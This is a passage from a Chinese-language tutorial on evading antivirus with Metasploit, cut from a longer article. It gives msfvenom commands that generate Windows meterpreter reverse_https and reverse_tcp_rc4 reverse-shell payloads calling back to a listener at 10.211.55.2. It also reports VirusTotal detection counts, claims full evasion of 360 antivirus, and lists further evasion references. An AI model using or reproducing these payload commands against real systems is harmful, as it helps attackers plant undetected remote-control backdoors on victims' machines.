7.8 使用reverse_https(VT免杀率29/70)
操作便利★★
免杀效果★★★
推荐指数★★★
详细文章链接:https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg
主要是参考Green_m的文章:https://www.freebuf.com/sectool/118714.html,可以一定程度的避开杀软的流量检测。
使用msfvenom生成payload
msfvenom -p windows/meterpreter/reverse_https lhost=10.211.55.2 lport=3333 -f exe -o payload1.exe在VC中编译后执行,360全免杀
virustotal.com中29/70个报毒
7.9 使用reverse_tcp_rc4(VT免杀率33/70)
操作便利★★
免杀效果★★★
推荐指数★★★
详细文章链接:https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg
和上面的方法一样,使用reverse_tcp_rc4也有同样的效果,而且不用设置stageencoder选项,更稳定更方便。
msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=10.211.55.2 lport=2223 rc4password=tidesec -f c利用rc4对传输的数据进行加密,密钥在生成时指定,在监听的服务端设置相同的密钥。
在VC中编译后执行,360全免杀,但是一会儿之后就又被查杀了。
virustotal.com中33/70个报毒
八、参考
很多内容参考了wiki百科和freebuf上Green_m和Anhkgg两位大佬的文章,在此表示感谢!想深入了解的可在访问下面链接。
免杀技术有一套:https://anhkgg.com/aanti-virus/
Meterpreter免杀及对抗分析:https://www.freebuf.com/sectool/157122.html
免杀艺术:https://www.4hou.com/technology/3853.html
Meterpreter免杀技巧分享:https://www.freebuf.com/sectool/118714.html
msf_wiki: https://github.com/rapid7/metasploit-framework/wiki
Create a wrapper for metasm’s C compiling function:https://github.com/rapid7/metasploit-framework/pull/10007
How to decode Base64 with Metasploit Framework Compiler: https://github.com/rapid7/metasploit-framework/wiki/How-to-decode-Base64-with-Metasploit-Framework-Compiler
使用msf编码器避开杀毒软件的检测:https://www.freebuf.com/column/216599.html
msf多重编码:https://blog.csdn.net/wyf12138/article/details/79825833
Msfvenom学习总结:
msfvenom生成后门的免杀测试:%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E7%9A%84%E5%85%8D%E6%9D%80%E6%B5%8B%E8%AF%95/